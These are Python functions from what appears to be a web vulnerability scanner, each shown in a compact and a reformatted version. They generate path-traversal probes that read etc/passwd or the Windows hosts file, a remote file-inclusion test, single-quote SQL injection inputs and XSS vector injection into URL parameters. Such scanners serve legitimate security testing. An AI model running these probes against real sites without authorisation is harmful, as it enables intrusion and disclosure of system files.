def base_rlfi_init(link, browser_args, depth): if '?' not in link: return [] nix_key = ('etc/passwd', 'root:x') win_key = ('windows/system32/drivers/etc/hosts', 'This is a sample HOSTS file') rem_key = ('https://raw.github.com/twisted/twisted/trunk/NEWS', 'Ticket numbers in this file can') nix_server = ('Ubuntu','Red Hat', 'CentOS', 'Unix', 'Debian', 'Linux','BSD') win_server = ('IIS', 'Microsoft', 'Win') server = base_scrape_headers(link, browser_args, ['server']) todo = [nix_key, win_key] if any(x in server for x in nix_server): todo = [nix_key] elif any(x in server for x in win_server): todo = [win_key] to_input = [InObject(url, key=rem_key[1]) for url in replace_params(link, rem_key[0], False)] for d in xrange(1, depth+1): for inclusion, key in todo: path = '../' * d + inclusion to_input.extend([InObject(url, key=key) for url in replace_params(link, path, False)]) return to_input
def base_rlfi_init(link, browser_args, depth): if '?' not in link: return [] nix_key = ('etc/passwd', 'root:x') win_key = ('windows/system32/drivers/etc/hosts', 'This is a sample HOSTS file') rem_key = ('https://raw.github.com/twisted/twisted/trunk/NEWS', 'Ticket numbers in this file can') nix_server = ('Ubuntu', 'Red Hat', 'CentOS', 'Unix', 'Debian', 'Linux', 'BSD') win_server = ('IIS', 'Microsoft', 'Win') server = base_scrape_headers(link, browser_args, ['server']) todo = [nix_key, win_key] if any(x in server for x in nix_server): todo = [nix_key] elif any(x in server for x in win_server): todo = [win_key] to_input = [ InObject(url, key=rem_key[1]) for url in replace_params(link, rem_key[0], False) ] for d in xrange(1, depth + 1): for inclusion, key in todo: path = '../' * d + inclusion to_input.extend([ InObject(url, key=key) for url in replace_params(link, path, False) ]) return to_input
def inn_base(self): urls = strip_open(self.args.in_file) todo = [] for url in urls: if '?' in url: todo.extend(replace_params(url, '\'')) return todo
def xss_init(self, my_link): output = my_link + ' ||| {}' matches = base_scan_dom(my_link, self.browser_args) if matches: self.output.append(output.format(matches)) if '?' in my_link: for vector in vectors: self.to_input.extend(replace_params(my_link, vector, keep_original=False)) files = scan_js(my_link, self.browser_args) self.to_input.extend(files)
def xss_init(self, my_link): output = my_link + ' ||| {}' matches = base_scan_dom(my_link, self.browser_args) if matches: self.output.append(output.format(matches)) if '?' in my_link: for vector in vectors: self.to_input.extend( replace_params(my_link, vector, keep_original=False)) files = scan_js(my_link, self.browser_args) self.to_input.extend(files)
def scan_xss(url, browser_args, job_name, out_name): scan_dom.delay(url, browser_args, job_name, out_name) args = (browser_args, job_name, out_name) files = scan_js(url, browser_args) group(scan_dom.subtask( (link,) + args, kwargs, **scan_xss.request.delivery_info) for link in files)() if '?' in url: sites = [] for vector in vectors: sites.extend(replace_params(url, vector, False)) group(test_xss.subtask( (link,) + args, **scan_xss.request.delivery_info) for link in sites)()
def scan_xss(url, browser_args, job_name, out_name): scan_dom.delay(url, browser_args, job_name, out_name) args = (browser_args, job_name, out_name) files = scan_js(url, browser_args) group( scan_dom.subtask((link, ) + args, kwargs, **scan_xss.request.delivery_info) for link in files)() if '?' in url: sites = [] for vector in vectors: sites.extend(replace_params(url, vector, False)) group( test_xss.subtask((link, ) + args, **scan_xss.request.delivery_info) for link in sites)()